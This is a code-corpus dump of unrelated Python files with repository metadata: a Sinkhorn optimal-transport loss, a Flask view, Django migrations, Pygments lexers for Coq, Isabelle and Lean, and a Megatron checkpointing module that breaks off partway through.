if j==0:
dp[i][j]=dp[i-1][j]*(1-P[i])
else:
dp[i][j]=dp[i-1][j-1]*P[i]+dp[i-1][j]*(1-P[i])
print(sum(dp[-1][n//2+1:]))
if __name__=='__main__':
main() | [
"[email protected]"
] | |
7d442a07bfb8f720507da67a316b7bfbddefbabe | e29b450bf924b983023db41a0cdea97cde129880 | /reversible/sinkhorn.py | da994a5c781f3dbf5244c34a45a3d33e8ec14a12 | [] | no_license | afcarl/generative-reversible | b9efedad155d9c08f0f299f0b861ff6ff53607cf | e21b0846c654e0e041562f715bc5ddd90dde0e07 | refs/heads/master | 2020-03-21T03:29:34.655671 | 2018-05-26T18:53:54 | 2018-05-26T18:53:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,783 | py | import torch as th
from reversible.gaussian import get_gauss_samples
from reversible.util import log_sum_exp, ensure_on_same_device, var_to_np
def sinkhorn_to_gauss_dist(outs, mean, std, **kwargs):
gauss_samples = get_gauss_samples(len(outs), mean, std)
return sinkhorn_sample_loss(outs, gauss_samples, **kwargs)
def M(u, v, C, epsilon):
"Modified cost for logarithmic updates"
"$M_{ij} = (-c_{ij} + u_i + v_j) / \epsilon$"
return (-C + u.unsqueeze(1) + v.unsqueeze(0)) / epsilon
def sinkhorn_sample_loss(samples_a, samples_b, epsilon=0.01, stop_threshold=0.1,
max_iters=50, normalize_cost_matrix=False, max_normed_entropy=None,
normalize_by_empirical_std_a=False):
assert normalize_cost_matrix in [False, 'mean', 'max']
diffs = samples_a.unsqueeze(1) - samples_b.unsqueeze(0)
if normalize_by_empirical_std_a:
stds = th.std(samples_a.detach(), dim=0, keepdim=True)
stds = th.clamp(stds, min=1e-5)
diffs = diffs / stds
C = th.sum(diffs * diffs, dim=2)
del diffs
C_nograd = C.detach()
if normalize_cost_matrix == 'mean':
C_nograd = C_nograd / th.mean(C_nograd)
elif normalize_cost_matrix == 'max':
C_nograd = C_nograd / th.max(C_nograd)
if max_normed_entropy is None:
estimated_trans_th = estimate_transport_matrix_sinkhorn(
C_nograd, epsilon=epsilon, stop_threshold=stop_threshold,
max_iters=max_iters)
else:
estimated_trans_th, _ = transport_mat_sinkhorn_below_entropy(
C_nograd, start_eps=epsilon, stop_threshold=stop_threshold,
max_iters_sinkhorn=max_iters, max_iters_for_entropy=10,
max_normed_entropy=max_normed_entropy)
cost = th.sqrt(th.sum(estimated_trans_th * C)) # Sinkhorn cost
return cost
def transport_mat_sinkhorn_below_entropy(
C, start_eps, max_normed_entropy, max_iters_for_entropy,
max_iters_sinkhorn=50, stop_threshold=1e-3):
normed_entropy = max_normed_entropy + 1
iteration = 0
cur_eps = start_eps
while (normed_entropy > max_normed_entropy) and (iteration < max_iters_for_entropy):
transport_mat = estimate_transport_matrix_sinkhorn(
C, epsilon=cur_eps, stop_threshold=stop_threshold, max_iters=max_iters_sinkhorn)
relevant_mat = transport_mat[transport_mat > 0]
normed_entropy = -th.sum(relevant_mat * th.log(relevant_mat)) / np.log(transport_mat.numel() * 1.)
normed_entropy = var_to_np(normed_entropy)
iteration += 1
cur_eps = cur_eps / 2
return transport_mat, cur_eps
def estimate_transport_matrix_sinkhorn(C, epsilon=0.01, stop_threshold=0.1,
max_iters=50):
n1 = C.size()[0]
n2 = C.size()[1]
mu = th.autograd.Variable(1. / n1 * th.FloatTensor(n1).fill_(1),
requires_grad=False)
nu = th.autograd.Variable(1. / n2 * th.FloatTensor(n2).fill_(1),
requires_grad=False)
mu, nu, C = ensure_on_same_device(mu, nu, C)
u, v, err = 0. * mu, 0. * nu, 0.
actual_nits = 0 # to check if algorithm terminates because of threshold or max iterations reached
for i in range(max_iters):
u1 = u # useful to check the update
u = epsilon * (
th.log(mu) - log_sum_exp(M(u, v, C, epsilon), dim=1, keepdim=True).squeeze()) + u
v = epsilon * (
th.log(nu) - log_sum_exp(M(u, v, C, epsilon).t(), dim=1, keepdim=True).squeeze()) + v
err = (u - u1).abs().sum()
actual_nits += 1
if var_to_np(err < stop_threshold).all():
break
estimated_transport_matrix = th.exp(M(u, v, C, epsilon))
return estimated_transport_matrix
| [
"[email protected]"
] | |
89f7995781d60bb6ec3ed228079f873bf72f7ce1 | f47df27f960b3c5abebf16145026d20fc81f062b | /dheeranet/views/home.py | 9d2568894366f760bc5e482240240503dcf65e9a | [] | no_license | dheera/web-dheeranet | 34eec0591872d01afd441ce97a4853c95fde18a8 | 1faceb4d54d91ae1b7ee3f7e449ee3f224600b08 | refs/heads/master | 2021-01-22T06:32:12.403454 | 2017-04-10T20:55:33 | 2017-04-10T20:55:33 | 20,196,792 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | from flask import Blueprint, render_template, abort, request
from jinja2 import TemplateNotFound
from dheeranet import static_bucket
from dheeranet.cache import s3_get_cached
import json, datetime
home = Blueprint('home', __name__,template_folder='../template')
@home.route('/')
def show():
home_items = json.loads(s3_get_cached(static_bucket, '__home__'))
news_items = filter(lambda x:x['type']=='news', home_items)
return render_template('home.html', news_items = news_items)
| [
"[email protected]"
] | |
c2ad9a49e4e23ffa98d960a2818b4175b1dece93 | b5029b5710f72010690c5e57fe5c045dcff2701c | /books_authors_app/migrations/0001_initial.py | 9f233b82732ee72e3c171a7a7c24c182c0d25b6d | [] | no_license | Jallnutt1/first_django_project | 2d059ed815227cf5c72af67e4e4074e95edf1508 | 200b98623292e806a407badf1cb9311e25bd561d | refs/heads/main | 2023-04-04T00:50:19.183891 | 2021-04-13T18:56:03 | 2021-04-13T18:56:03 | 357,659,099 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,166 | py | # Generated by Django 2.2 on 2021-04-09 00:55
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Books',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('desc', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
| [
"{ID}+{username}@users.noreply.github.com"
] | {ID}+{username}@users.noreply.github.com |
4c9afb7f1a1c3156c3c0e419a9d664957618cf06 | 159d4ae61f4ca91d94e29e769697ff46d11ae4a4 | /venv/lib/python3.9/site-packages/pygments/lexers/theorem.py | ec55a32ea39569297ed9647deaf213b073c5d5f6 | [
"MIT"
] | permissive | davidycliao/bisCrawler | 729db002afe10ae405306b9eed45b782e68eace8 | f42281f35b866b52e5860b6a062790ae8147a4a4 | refs/heads/main | 2023-05-24T00:41:50.224279 | 2023-01-22T23:17:51 | 2023-01-22T23:17:51 | 411,470,732 | 8 | 0 | MIT | 2023-02-09T16:28:24 | 2021-09-28T23:48:13 | Python | UTF-8 | Python | false | false | 19,507 | py | """
pygments.lexers.theorem
~~~~~~~~~~~~~~~~~~~~~~~
Lexers for theorem-proving languages.
:copyright: Copyright 2006-2021 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, default, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Generic
__all__ = ['CoqLexer', 'IsabelleLexer', 'LeanLexer']
class CoqLexer(RegexLexer):
"""
For the `Coq <http://coq.inria.fr/>`_ theorem prover.
.. versionadded:: 1.5
"""
name = 'Coq'
aliases = ['coq']
filenames = ['*.v']
mimetypes = ['text/x-coq']
flags = re.UNICODE
keywords1 = (
# Vernacular commands
'Section', 'Module', 'End', 'Require', 'Import', 'Export', 'Variable',
'Variables', 'Parameter', 'Parameters', 'Axiom', 'Hypothesis',
'Hypotheses', 'Notation', 'Local', 'Tactic', 'Reserved', 'Scope',
'Open', 'Close', 'Bind', 'Delimit', 'Definition', 'Let', 'Ltac',
'Fixpoint', 'CoFixpoint', 'Morphism', 'Relation', 'Implicit',
'Arguments', 'Set', 'Unset', 'Contextual', 'Strict', 'Prenex',
'Implicits', 'Inductive', 'CoInductive', 'Record', 'Structure',
'Canonical', 'Coercion', 'Theorem', 'Lemma', 'Corollary',
'Proposition', 'Fact', 'Remark', 'Example', 'Proof', 'Goal', 'Save',
'Qed', 'Defined', 'Hint', 'Resolve', 'Rewrite', 'View', 'Search',
'Abort', 'Admitted',
'Show', 'Print', 'Printing', 'All', 'Graph', 'Projections', 'inside',
'outside', 'Check', 'Global', 'Instance', 'Class', 'Existing',
'Universe', 'Polymorphic', 'Monomorphic', 'Context'
)
keywords2 = (
# Gallina
'forall', 'exists', 'exists2', 'fun', 'fix', 'cofix', 'struct',
'match', 'end', 'in', 'return', 'let', 'if', 'is', 'then', 'else',
'for', 'of', 'nosimpl', 'with', 'as',
)
keywords3 = (
# Sorts
'Type', 'Prop', 'SProp',
)
keywords4 = (
# Tactics
'pose', 'set', 'move', 'case', 'elim', 'apply', 'clear', 'hnf', 'intro',
'intros', 'generalize', 'rename', 'pattern', 'after', 'destruct',
'induction', 'using', 'refine', 'inversion', 'injection', 'rewrite',
'congr', 'unlock', 'compute', 'ring', 'field', 'replace', 'fold',
'unfold', 'change', 'cutrewrite', 'simpl', 'have', 'suff', 'wlog',
'suffices', 'without', 'loss', 'nat_norm', 'assert', 'cut', 'trivial',
'revert', 'bool_congr', 'nat_congr', 'symmetry', 'transitivity', 'auto',
'split', 'left', 'right', 'autorewrite', 'tauto', 'setoid_rewrite',
'intuition', 'eauto', 'eapply', 'econstructor', 'etransitivity',
'constructor', 'erewrite', 'red', 'cbv', 'lazy', 'vm_compute',
'native_compute', 'subst',
)
keywords5 = (
# Terminators
'by', 'done', 'exact', 'reflexivity', 'tauto', 'romega', 'omega',
'assumption', 'solve', 'contradiction', 'discriminate',
'congruence',
)
keywords6 = (
# Control
'do', 'last', 'first', 'try', 'idtac', 'repeat',
)
# 'as', 'assert', 'begin', 'class', 'constraint', 'do', 'done',
# 'downto', 'else', 'end', 'exception', 'external', 'false',
# 'for', 'fun', 'function', 'functor', 'if', 'in', 'include',
# 'inherit', 'initializer', 'lazy', 'let', 'match', 'method',
# 'module', 'mutable', 'new', 'object', 'of', 'open', 'private',
# 'raise', 'rec', 'sig', 'struct', 'then', 'to', 'true', 'try',
# 'type', 'val', 'virtual', 'when', 'while', 'with'
keyopts = (
'!=', '#', '&', '&&', r'\(', r'\)', r'\*', r'\+', ',', '-', r'-\.',
'->', r'\.', r'\.\.', ':', '::', ':=', ':>', ';', ';;', '<', '<-',
'<->', '=', '>', '>]', r'>\}', r'\?', r'\?\?', r'\[', r'\[<', r'\[>',
r'\[\|', ']', '_', '`', r'\{', r'\{<', r'\|', r'\|]', r'\}', '~', '=>',
r'/\\', r'\\/', r'\{\|', r'\|\}',
# 'Π', 'Σ', # Not defined in the standard library
'λ', '¬', '∧', '∨', '∀', '∃', '→', '↔', '≠', '≤', '≥',
)
operators = r'[!$%&*+\./:<=>?@^|~-]'
prefix_syms = r'[!?~]'
infix_syms = r'[=<>@^|&+\*/$%-]'
tokens = {
'root': [
(r'\s+', Text),
(r'false|true|\(\)|\[\]', Name.Builtin.Pseudo),
(r'\(\*', Comment, 'comment'),
(words(keywords1, prefix=r'\b', suffix=r'\b'), Keyword.Namespace),
(words(keywords2, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keywords3, prefix=r'\b', suffix=r'\b'), Keyword.Type),
(words(keywords4, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keywords5, prefix=r'\b', suffix=r'\b'), Keyword.Pseudo),
(words(keywords6, prefix=r'\b', suffix=r'\b'), Keyword.Reserved),
# (r'\b([A-Z][\w\']*)(\.)', Name.Namespace, 'dotted'),
(r'\b([A-Z][\w\']*)', Name),
(r'(%s)' % '|'.join(keyopts[::-1]), Operator),
(r'(%s|%s)?%s' % (infix_syms, prefix_syms, operators), Operator),
(r"[^\W\d][\w']*", Name),
(r'\d[\d_]*', Number.Integer),
(r'0[xX][\da-fA-F][\da-fA-F_]*', Number.Hex),
(r'0[oO][0-7][0-7_]*', Number.Oct),
(r'0[bB][01][01_]*', Number.Bin),
(r'-?\d[\d_]*(.[\d_]*)?([eE][+\-]?\d[\d_]*)', Number.Float),
(r"'(?:(\\[\\\"'ntbr ])|(\\[0-9]{3})|(\\x[0-9a-fA-F]{2}))'", String.Char),
(r"'.'", String.Char),
(r"'", Keyword), # a stray quote is another syntax element
(r'"', String.Double, 'string'),
(r'[~?][a-z][\w\']*:', Name),
(r'\S', Name.Builtin.Pseudo),
],
'comment': [
(r'[^(*)]+', Comment),
(r'\(\*', Comment, '#push'),
(r'\*\)', Comment, '#pop'),
(r'[(*)]', Comment),
],
'string': [
(r'[^"]+', String.Double),
(r'""', String.Double),
(r'"', String.Double, '#pop'),
],
'dotted': [
(r'\s+', Text),
(r'\.', Punctuation),
(r'[A-Z][\w\']*(?=\s*\.)', Name.Namespace),
(r'[A-Z][\w\']*', Name.Class, '#pop'),
(r'[a-z][a-z0-9_\']*', Name, '#pop'),
default('#pop')
],
}
def analyse_text(text):
if 'Qed' in text and 'Proof' in text:
return 1
class IsabelleLexer(RegexLexer):
"""
For the `Isabelle <http://isabelle.in.tum.de/>`_ proof assistant.
.. versionadded:: 2.0
"""
name = 'Isabelle'
aliases = ['isabelle']
filenames = ['*.thy']
mimetypes = ['text/x-isabelle']
keyword_minor = (
'and', 'assumes', 'attach', 'avoids', 'binder', 'checking',
'class_instance', 'class_relation', 'code_module', 'congs',
'constant', 'constrains', 'datatypes', 'defines', 'file', 'fixes',
'for', 'functions', 'hints', 'identifier', 'if', 'imports', 'in',
'includes', 'infix', 'infixl', 'infixr', 'is', 'keywords', 'lazy',
'module_name', 'monos', 'morphisms', 'no_discs_sels', 'notes',
'obtains', 'open', 'output', 'overloaded', 'parametric', 'permissive',
'pervasive', 'rep_compat', 'shows', 'structure', 'type_class',
'type_constructor', 'unchecked', 'unsafe', 'where',
)
keyword_diag = (
'ML_command', 'ML_val', 'class_deps', 'code_deps', 'code_thms',
'display_drafts', 'find_consts', 'find_theorems', 'find_unused_assms',
'full_prf', 'help', 'locale_deps', 'nitpick', 'pr', 'prf',
'print_abbrevs', 'print_antiquotations', 'print_attributes',
'print_binds', 'print_bnfs', 'print_bundles',
'print_case_translations', 'print_cases', 'print_claset',
'print_classes', 'print_codeproc', 'print_codesetup',
'print_coercions', 'print_commands', 'print_context',
'print_defn_rules', 'print_dependencies', 'print_facts',
'print_induct_rules', 'print_inductives', 'print_interps',
'print_locale', 'print_locales', 'print_methods', 'print_options',
'print_orders', 'print_quot_maps', 'print_quotconsts',
'print_quotients', 'print_quotientsQ3', 'print_quotmapsQ3',
'print_rules', 'print_simpset', 'print_state', 'print_statement',
'print_syntax', 'print_theorems', 'print_theory', 'print_trans_rules',
'prop', 'pwd', 'quickcheck', 'refute', 'sledgehammer', 'smt_status',
'solve_direct', 'spark_status', 'term', 'thm', 'thm_deps', 'thy_deps',
'try', 'try0', 'typ', 'unused_thms', 'value', 'values', 'welcome',
'print_ML_antiquotations', 'print_term_bindings', 'values_prolog',
)
keyword_thy = ('theory', 'begin', 'end')
keyword_section = ('header', 'chapter')
keyword_subsection = (
'section', 'subsection', 'subsubsection', 'sect', 'subsect',
'subsubsect',
)
keyword_theory_decl = (
'ML', 'ML_file', 'abbreviation', 'adhoc_overloading', 'arities',
'atom_decl', 'attribute_setup', 'axiomatization', 'bundle',
'case_of_simps', 'class', 'classes', 'classrel', 'codatatype',
'code_abort', 'code_class', 'code_const', 'code_datatype',
'code_identifier', 'code_include', 'code_instance', 'code_modulename',
'code_monad', 'code_printing', 'code_reflect', 'code_reserved',
'code_type', 'coinductive', 'coinductive_set', 'consts', 'context',
'datatype', 'datatype_new', 'datatype_new_compat', 'declaration',
'declare', 'default_sort', 'defer_recdef', 'definition', 'defs',
'domain', 'domain_isomorphism', 'domaindef', 'equivariance',
'export_code', 'extract', 'extract_type', 'fixrec', 'fun',
'fun_cases', 'hide_class', 'hide_const', 'hide_fact', 'hide_type',
'import_const_map', 'import_file', 'import_tptp', 'import_type_map',
'inductive', 'inductive_set', 'instantiation', 'judgment', 'lemmas',
'lifting_forget', 'lifting_update', 'local_setup', 'locale',
'method_setup', 'nitpick_params', 'no_adhoc_overloading',
'no_notation', 'no_syntax', 'no_translations', 'no_type_notation',
'nominal_datatype', 'nonterminal', 'notation', 'notepad', 'oracle',
'overloading', 'parse_ast_translation', 'parse_translation',
'partial_function', 'primcorec', 'primrec', 'primrec_new',
'print_ast_translation', 'print_translation', 'quickcheck_generator',
'quickcheck_params', 'realizability', 'realizers', 'recdef', 'record',
'refute_params', 'setup', 'setup_lifting', 'simproc_setup',
'simps_of_case', 'sledgehammer_params', 'spark_end', 'spark_open',
'spark_open_siv', 'spark_open_vcg', 'spark_proof_functions',
'spark_types', 'statespace', 'syntax', 'syntax_declaration', 'text',
'text_raw', 'theorems', 'translations', 'type_notation',
'type_synonym', 'typed_print_translation', 'typedecl', 'hoarestate',
'install_C_file', 'install_C_types', 'wpc_setup', 'c_defs', 'c_types',
'memsafe', 'SML_export', 'SML_file', 'SML_import', 'approximate',
'bnf_axiomatization', 'cartouche', 'datatype_compat',
'free_constructors', 'functor', 'nominal_function',
'nominal_termination', 'permanent_interpretation',
'binds', 'defining', 'smt2_status', 'term_cartouche',
'boogie_file', 'text_cartouche',
)
keyword_theory_script = ('inductive_cases', 'inductive_simps')
keyword_theory_goal = (
'ax_specification', 'bnf', 'code_pred', 'corollary', 'cpodef',
'crunch', 'crunch_ignore',
'enriched_type', 'function', 'instance', 'interpretation', 'lemma',
'lift_definition', 'nominal_inductive', 'nominal_inductive2',
'nominal_primrec', 'pcpodef', 'primcorecursive',
'quotient_definition', 'quotient_type', 'recdef_tc', 'rep_datatype',
'schematic_corollary', 'schematic_lemma', 'schematic_theorem',
'spark_vc', 'specification', 'subclass', 'sublocale', 'termination',
'theorem', 'typedef', 'wrap_free_constructors',
)
keyword_qed = ('by', 'done', 'qed')
keyword_abandon_proof = ('sorry', 'oops')
keyword_proof_goal = ('have', 'hence', 'interpret')
keyword_proof_block = ('next', 'proof')
keyword_proof_chain = (
'finally', 'from', 'then', 'ultimately', 'with',
)
keyword_proof_decl = (
'ML_prf', 'also', 'include', 'including', 'let', 'moreover', 'note',
'txt', 'txt_raw', 'unfolding', 'using', 'write',
)
keyword_proof_asm = ('assume', 'case', 'def', 'fix', 'presume')
keyword_proof_asm_goal = ('guess', 'obtain', 'show', 'thus')
keyword_proof_script = (
'apply', 'apply_end', 'apply_trace', 'back', 'defer', 'prefer',
)
operators = (
'::', ':', '(', ')', '[', ']', '_', '=', ',', '|',
'+', '-', '!', '?',
)
proof_operators = ('{', '}', '.', '..')
tokens = {
'root': [
(r'\s+', Text),
(r'\(\*', Comment, 'comment'),
(r'\{\*', Comment, 'text'),
(words(operators), Operator),
(words(proof_operators), Operator.Word),
(words(keyword_minor, prefix=r'\b', suffix=r'\b'), Keyword.Pseudo),
(words(keyword_diag, prefix=r'\b', suffix=r'\b'), Keyword.Type),
(words(keyword_thy, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_theory_decl, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_section, prefix=r'\b', suffix=r'\b'), Generic.Heading),
(words(keyword_subsection, prefix=r'\b', suffix=r'\b'), Generic.Subheading),
(words(keyword_theory_goal, prefix=r'\b', suffix=r'\b'), Keyword.Namespace),
(words(keyword_theory_script, prefix=r'\b', suffix=r'\b'), Keyword.Namespace),
(words(keyword_abandon_proof, prefix=r'\b', suffix=r'\b'), Generic.Error),
(words(keyword_qed, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_goal, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_block, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_decl, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_chain, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_asm, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_asm_goal, prefix=r'\b', suffix=r'\b'), Keyword),
(words(keyword_proof_script, prefix=r'\b', suffix=r'\b'), Keyword.Pseudo),
(r'\\<\w*>', Text.Symbol),
(r"[^\W\d][.\w']*", Name),
(r"\?[^\W\d][.\w']*", Name),
(r"'[^\W\d][.\w']*", Name.Type),
(r'\d[\d_]*', Name), # display numbers as name
(r'0[xX][\da-fA-F][\da-fA-F_]*', Number.Hex),
(r'0[oO][0-7][0-7_]*', Number.Oct),
(r'0[bB][01][01_]*', Number.Bin),
(r'"', String, 'string'),
(r'`', String.Other, 'fact'),
],
'comment': [
(r'[^(*)]+', Comment),
(r'\(\*', Comment, '#push'),
(r'\*\)', Comment, '#pop'),
(r'[(*)]', Comment),
],
'text': [
(r'[^*}]+', Comment),
(r'\*\}', Comment, '#pop'),
(r'\*', Comment),
(r'\}', Comment),
],
'string': [
(r'[^"\\]+', String),
(r'\\<\w*>', String.Symbol),
(r'\\"', String),
(r'\\', String),
(r'"', String, '#pop'),
],
'fact': [
(r'[^`\\]+', String.Other),
(r'\\<\w*>', String.Symbol),
(r'\\`', String.Other),
(r'\\', String.Other),
(r'`', String.Other, '#pop'),
],
}
class LeanLexer(RegexLexer):
"""
For the `Lean <https://github.com/leanprover/lean>`_
theorem prover.
.. versionadded:: 2.0
"""
name = 'Lean'
aliases = ['lean']
filenames = ['*.lean']
mimetypes = ['text/x-lean']
flags = re.MULTILINE | re.UNICODE
tokens = {
'root': [
(r'\s+', Text),
(r'/--', String.Doc, 'docstring'),
(r'/-', Comment, 'comment'),
(r'--.*?$', Comment.Single),
(words((
'import', 'renaming', 'hiding',
'namespace',
'local',
'private', 'protected', 'section',
'include', 'omit', 'section',
'protected', 'export',
'open',
'attribute',
), prefix=r'\b', suffix=r'\b'), Keyword.Namespace),
(words((
'lemma', 'theorem', 'def', 'definition', 'example',
'axiom', 'axioms', 'constant', 'constants',
'universe', 'universes',
'inductive', 'coinductive', 'structure', 'extends',
'class', 'instance',
'abbreviation',
'noncomputable theory',
'noncomputable', 'mutual', 'meta',
'attribute',
'parameter', 'parameters',
'variable', 'variables',
'reserve', 'precedence',
'postfix', 'prefix', 'notation', 'infix', 'infixl', 'infixr',
'begin', 'by', 'end',
'set_option',
'run_cmd',
), prefix=r'\b', suffix=r'\b'), Keyword.Declaration),
(r'@\[[^\]]*\]', Keyword.Declaration),
(words((
'forall', 'fun', 'Pi', 'from', 'have', 'show', 'assume', 'suffices',
'let', 'if', 'else', 'then', 'in', 'with', 'calc', 'match',
'do'
), prefix=r'\b', suffix=r'\b'), Keyword),
(words(('sorry', 'admit'), prefix=r'\b', suffix=r'\b'), Generic.Error),
(words(('Sort', 'Prop', 'Type'), prefix=r'\b', suffix=r'\b'), Keyword.Type),
(words((
'#eval', '#check', '#reduce', '#exit',
'#print', '#help',
), suffix=r'\b'), Keyword),
(words((
'(', ')', ':', '{', '}', '[', ']', '⟨', '⟩', '‹', '›', '⦃', '⦄', ':=', ',',
)), Operator),
(r'[A-Za-z_\u03b1-\u03ba\u03bc-\u03fb\u1f00-\u1ffe\u2100-\u214f]'
r'[.A-Za-z_\'\u03b1-\u03ba\u03bc-\u03fb\u1f00-\u1ffe\u2070-\u2079'
r'\u207f-\u2089\u2090-\u209c\u2100-\u214f0-9]*', Name),
(r'0x[A-Za-z0-9]+', Number.Integer),
(r'0b[01]+', Number.Integer),
(r'\d+', Number.Integer),
(r'"', String.Double, 'string'),
(r"'(?:(\\[\\\"'nt])|(\\x[0-9a-fA-F]{2})|(\\u[0-9a-fA-F]{4})|.)'", String.Char),
(r'[~?][a-z][\w\']*:', Name.Variable),
(r'\S', Name.Builtin.Pseudo),
],
'comment': [
(r'[^/-]', Comment.Multiline),
(r'/-', Comment.Multiline, '#push'),
(r'-/', Comment.Multiline, '#pop'),
(r'[/-]', Comment.Multiline)
],
'docstring': [
(r'[^/-]', String.Doc),
(r'-/', String.Doc, '#pop'),
(r'[/-]', String.Doc)
],
'string': [
(r'[^\\"]+', String.Double),
(r"(?:(\\[\\\"'nt])|(\\x[0-9a-fA-F]{2})|(\\u[0-9a-fA-F]{4}))", String.Escape),
('"', String.Double, '#pop'),
],
}
| [
"[email protected]"
] | |
d0fa78d37064bf03251c9c6edf18a378195106d5 | 6196bd8f9226042b4c8e171313e273d1875c3ee4 | /up_down_chain/up_down_chain/app/Subseribe/migrations/0002_bidsusersetting_mid.py | d2f23630662918aa99b11057208f625ad32ce97c | [] | no_license | wang18722/Up_down_chain | 87230f057dadea95ab8b2760ca756afe00675b26 | 3c18d5d5727db1562438edea66ef15f54b378e33 | refs/heads/master | 2022-12-27T09:04:49.976753 | 2019-07-01T01:19:12 | 2019-07-01T01:19:12 | 225,579,284 | 0 | 0 | null | 2022-12-08T01:23:21 | 2019-12-03T09:22:22 | Python | UTF-8 | Python | false | false | 694 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-06-24 05:29
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('Subseribe', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='bidsusersetting',
name='mid',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='用户'),
),
]
| [
"[email protected]"
] | |
2770b1389482e8828867d97a6aa1bf0489db3e64 | 4fc86f5c444f52619f9f748c9bad5bf3e0e2c0b2 | /megatron/checkpointing.py | ddada534b7786ee8a8fd8062495fd8c81ab1ff93 | [
"MIT",
"Apache-2.0"
] | permissive | Xianchao-Wu/megatron2 | 95ea620b74c66e51f9e31075b1df6bb1b761678b | f793c37223b32051cb61d3b1d5661dddd57634bf | refs/heads/main | 2023-08-17T03:42:31.602515 | 2021-09-24T05:12:00 | 2021-09-24T05:12:00 | 330,527,561 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,103 | py | # coding=utf-8
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Input/output checkpointing."""
import os
import random
import sys
import numpy as np
import torch
from torch.nn.parallel import DistributedDataParallel as torchDDP
from megatron import mpu, get_args, update_num_microbatches
from megatron import get_args
from megatron import print_rank_0
_CHECKPOINT_VERSION = None
def set_checkpoint_version(value):
global _CHECKPOINT_VERSION
assert _CHECKPOINT_VERSION is None, \
"checkpoint version already set"
_CHECKPOINT_VERSION = value
def get_checkpoint_version():
global _CHECKPOINT_VERSION
return _CHECKPOINT_VERSION
def check_checkpoint_args(checkpoint_args):
"""Ensure fixed arguments for a model are the same for the input
arguments and the one retrieved from checkpoint."""
args = get_args()
def _compare(arg_name, old_arg_name=None):
if old_arg_name is not None:
checkpoint_value = getattr(checkpoint_args, old_arg_name)
else:
checkpoint_value = getattr(checkpoint_args, arg_name)
args_value = getattr(args, arg_name)
error_message = '{} value from checkpoint ({}) is not equal to the ' \
'input argument value ({}).'.format(
arg_name, checkpoint_value, args_value)
assert checkpoint_value == args_value, error_message
_compare('num_layers')
_compare('hidden_size')
_compare('num_attention_heads')
_compare('max_position_embeddings')
_compare('make_vocab_size_divisible_by')
_compare('padded_vocab_size')
_compare('tokenizer_type')
if get_checkpoint_version() < 3.0:
_compare('tensor_model_parallel_size',
old_arg_name='model_parallel_size')
if get_checkpoint_version() >= 3.0:
_compare('tensor_model_parallel_size')
_compare('pipeline_model_parallel_size')
def ensure_directory_exists(filename):
"""Build filename's path if it does not already exists."""
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
def get_checkpoint_name(checkpoints_path, iteration,
release=False):
"""A unified checkpoint name."""
if release:
directory = 'release'
else:
directory = 'iter_{:07d}'.format(iteration)
# Use both the tensor and pipeline MP rank.
if mpu.get_pipeline_model_parallel_world_size() == 1:
return os.path.join(checkpoints_path, directory,
'mp_rank_{:02d}'.format(
mpu.get_tensor_model_parallel_rank()),
'model_optim_rng.pt')
return os.path.join(checkpoints_path, directory, # TODO important for mp=model parallel, not implemented yet!
'mp_rank_{:02d}_{:03d}'.format(
mpu.get_tensor_model_parallel_rank(),
mpu.get_pipeline_model_parallel_rank()),
'model_optim_rng.pt')
def get_checkpoint_tracker_filename(checkpoints_path):
"""Tracker file rescords the latest chckpoint during
training to restart from."""
return os.path.join(checkpoints_path, 'latest_checkpointed_iteration.txt')
def save_checkpoint(iteration, model, optimizer, lr_scheduler):
"""Save a model checkpoint."""
args = get_args()
# Only rank zero of the data parallel writes to the disk.
if isinstance(model, torchDDP):
model = model.module
if torch.distributed.get_rank() == 0:
print('saving checkpoint at iteration {:7d} to {}'.format(
iteration, args.save), flush=True)
if mpu.get_data_parallel_rank() == 0:
# Arguments, iteration, and model.
state_dict = {}
state_dict['args'] = args
state_dict['checkpoint_version'] = 3.0
state_dict['iteration'] = iteration
state_dict['model'] = model.state_dict_for_save_checkpoint()
# Optimizer stuff.
if not args.no_save_optim:
if optimizer is not None:
state_dict['optimizer'] = optimizer.state_dict()
if lr_scheduler is not None:
